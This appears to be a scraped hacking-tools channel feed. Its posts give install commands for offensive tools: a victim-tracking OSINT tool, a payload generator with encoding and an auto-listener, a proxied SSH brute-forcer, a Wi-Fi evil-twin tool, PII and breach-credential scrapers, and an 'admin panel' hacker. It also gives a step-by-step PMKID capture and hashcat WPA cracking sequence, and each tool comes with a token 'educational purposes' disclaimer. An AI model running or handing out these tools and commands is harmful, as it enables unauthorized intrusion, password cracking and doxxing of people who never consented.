797
مشترکین
اطلاعاتی وجود ندارد24 ساعت
اطلاعاتی وجود ندارد7 روز
اطلاعاتی وجود ندارد30 روز
آرشیو پست ها
797
¶¶ https://osintframework.com/
OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.
#osint
------------------------
Documentation
OpSec
Threat Intelligence
Exploits & Advisories
Malicious File Analysis
Tools
Encoding / Decoding
Classifieds
Digital Currency
Dark Web
Terrorism
Mobile Emulation
Metadata
Language Translation
Archives
Forums / Blogs / IRC
Search Engines
Geolocation Tools / Maps
Transportation
Business Records
Public Records
Telephone Numbers
Dating
People Search Engines
Instant Messaging
Social Networks
Images / Videos / Docs
IP Address
Domain Name
797
¶¶ INFO-X
Info-X is a information gathering tool...with this tool You can get vectims like ip , gmail , phone number information
#osint #info #ip #phonenumber
📍pkg update
📍pkg upgrade
📍pkg install python
📍pkg install git
📍pip install requests
📍pip install bs4
📍pip install futures
📍pip install mechanize
📍cd $HOME
📍rm -rf INFO-X
📍git clone --depth=1 https://github.com/U7P4L-IN/INFO-X.git
📍cd INFO-X
📍python INFO.py
[01] Track IP Address
[02] Phone Number Info
[03] E-Mail Info
[04] More Tools
[05] Contract Me
[00] Exit
797
¶¶ Beta_Nicco
An advance payload generation tool which automates your payload creation work. It also features some feature like ;-
sudo apt-get update && sudo apt-get upgrade -y
📍git clone https://github.com/empath1928/Beta_Nicco
📍cd Beta_Nicco
📍ls
📍chmod +x setup.sh
📍./setup.sh OR bash setup.sh
[ 1 ] ---> Payload for any platform
[ 2 ] ---> Encoding the payload for aviation
[ 3 ] ---> Auto listner as well as Custom for easy process
797
¶¶ waf-bypass
Check your WAF before an attacker does
WAF bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by Nemesida WAF team with the participation of community.
📍git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
📍python3 -m pip install -r /opt/waf-bypass/requirements.txt
📍python3 /opt/waf-bypass/main.py --host='example.com'
797
Orbitaldump:-- A Simple Multi-Threaded Distributed SSH Brute-Forcing Tool Written In Python.
When the script is executed without the --proxies switch, it acts just like any other multi-threaded SSH brute-forcing script. When the --proxies switch is added, the script pulls a list (usually thousands) of SOCKS4 proxies from ProxyScrape and launch all brute-force attacks over the SOCKS4 proxies so brute-force attempts will be less likely to be rate-limited by the target host.
Usages:-
https://github.com/k4yt3x/orbitaldump
Note:- This tool is only for educational purposes. We are not responsible for any misuse or illegal activities.
Facebook Page:-
https://www.facebook.com/ZeroDayExploitware
797
☰☲☷ FLU [X] I0N ☰☲☷
☲ WI-FI ☲
Ver: 6.9
Installation:-
cp $(find /sdcard/Download -name fluxion.zip) ./;unzip fluxion.zip && rm -rf fluxion.zip;cd fluxion;mv fluxion /usr/bin;chmod 755 /usr/bin/fluxion;cd .. && mv fluxion /usr/share
Howto? (make sure to run user interface in vnc/kex as root)
Now you can just type fluxion and done ;)
797
Skiptracer - OSINT scraping framework
Initial attack vectors for recon usually involve utilizing pay-for-data/API (Recon-NG), or paying to utilize transforms (Maltego) to get data mining results. Skiptracer utilizes some basic python webscraping (BeautifulSoup) of PII paywall sites to compile passive information on a target on a ramen noodle budget.
Installation
$ git clone https://github.com/xillwillx/skiptracer.git skiptracer
$ cd skiptracer
Install requirements
$ pip install -r requirements.txt
Run
$ python skiptracer.py -l (phone|email|sn|name|plate)
The modules will allow queries for the following:
- Phone
- Email
- Screen names
- Real names
- Addresses
- IP
- Hostname
- Breach Credentials
Disclaimer:- This project was created for educational purposes and should not be used in environments without legal authorization.
https://gitlab.com/illwill/skiptracer
797
#nethunter #wifihacking #wpa #wpa2
#androidtools #TermuxToolx #pmkidhashcrack #pmkid #hashcat #samsungnote9 #android
¶¶https://www.cyberark.com/resources/threat-research-blog/cracking-wifi-at-scale-with-one-simple-trick
COMMANDS //
📍sudo systemctl stop NetworkManager.service
📍sudo systemctl stop wpa_supplicant.service
📍sudo hcxdumptool -i wlan1 -o dumpfile.pcapng --active_beacon --enable_status=15
📍sudo systemctl start wpa_supplicant.service
📍sudo systemctl start NetworkManager.service
📍hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
📍hashcat -m 22000 hash.hc22000 wordlist.txt
¶¶ Windows:
📍hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
📍hashcat.exe -m 22000 hash.hc22000 -a 3 --increment --increment-min 8 --increment-max 14 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d
797
nethunter on (Samsung note9 )
Monitor mode & packet injection works
HID= Not working
USB: 2/3
realtek /mediatek / and atheros adapters works
includes : alfa adapters if you have a samsung note9 rooted DM only if you have samsung note9 V=9 and V=11
RTL8192EU
RTL8188EUS
RTL8812AU
Mediatek = MT7601U
Atheros AR9271
#wifite2 #wps #wpa #wpa2 #hashcat
797
Complete Linux Training Course
Download link-
https://drive.google.com/drive/folders/1-is9JovkcB4gjnNRMhtX5AsB2lyxOaVp
Don't Forget To React
ᴊᴏɪɴ ꜰᴏʀ ᴍᴏʀᴇ ›
;@hackingcourses07
797
ADMINHACK
will hack the admin panel of the site.
Installing for termux
pkg upgrade
pkg update
pkg install git
git clone https://github.com/mishakorzik/AdminHack
cd AdminHack
bash setup.sh
Everything is ready! Now we are waiting for everything to download!
succes
Installing for linux
apt update
apt upgrade
apt install git
git clone https://github.com/mishakorzik/AdminHack
cd AdminHack
bash setup.sh
Start Program
Enter a command to start AdminHack
bash AdminHack.sh
Note:- This tool is only for educational purposes. We are not responsible for any misuse or illegal activities.
797
¶¶MailFinder
#osint
OSINT tool for finding email by first and last name
apt update
apt upgrade
apt install git
apt install python
pip3 install requests
git clone https://github.com/mishakorzik/MailFinder
cd MailFinder
python MailFinder.py
